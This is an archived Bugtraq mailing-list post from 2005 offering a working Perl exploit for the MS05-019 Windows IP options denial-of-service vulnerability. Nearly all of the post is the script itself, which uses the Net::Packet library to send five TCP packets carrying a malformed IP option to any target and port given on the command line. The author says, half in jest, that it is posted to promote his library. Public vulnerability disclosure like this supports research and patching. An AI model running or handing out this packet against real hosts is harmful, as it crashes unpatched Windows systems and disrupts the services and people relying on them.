MS05-019 Windows IP options DoS exploit

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: MS05-019 Windows IP options DoS exploit
From: GomoR <bugtraq@xxxxxxxxx>
Date: Sun, 24 Apr 2005 22:24:51 +0200
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Organization: None
User-agent: Pine

   Here is another exploit for MS05-019 vulnerability.

   Well, it is just to promote Net::Packet ;)

---
#!/usr/bin/perl
use strict;
use warnings;

my %opts;
use Getopt::Std;
getopts('t:p:', \%opts);
die("Usage: $0 -t TARGET -p PORT\n") unless $opts{t} && $opts{p};

use Net::Pkt;

$Env->debug(3);

my $frame = Net::Packet::Frame->new(
   l3 => Net::Packet::IPv4->new(
      dst     => $opts{t},
      options => "\x03\x27". 'G'x38,
   ),
   l4 => Net::Packet::TCP->new(
      dst => $opts{p},
   ),
);

$frame->send for 1..5;
---

-- 
  ^  ___  ___    FreeBSD Network - http://www.GomoR.org/ <-+
  | / __ |__/          Systems & Security Engineer         |
  | \__/ |  \     ---[ zsh$ alias psed='perl -pe ' ]---    |
  +-->  Net::Packet <=> http://search.cpan.org/~gomor/  <--+

Prev by Date: remote command execution in include.cgi script
Next by Date: [INetCop Security Advisory] Snmppd potentially format string vulnerability.
Previous by thread: remote command execution in include.cgi script
Next by thread: [INetCop Security Advisory] Snmppd potentially format string vulnerability.
Index(es):
- Date
- Thread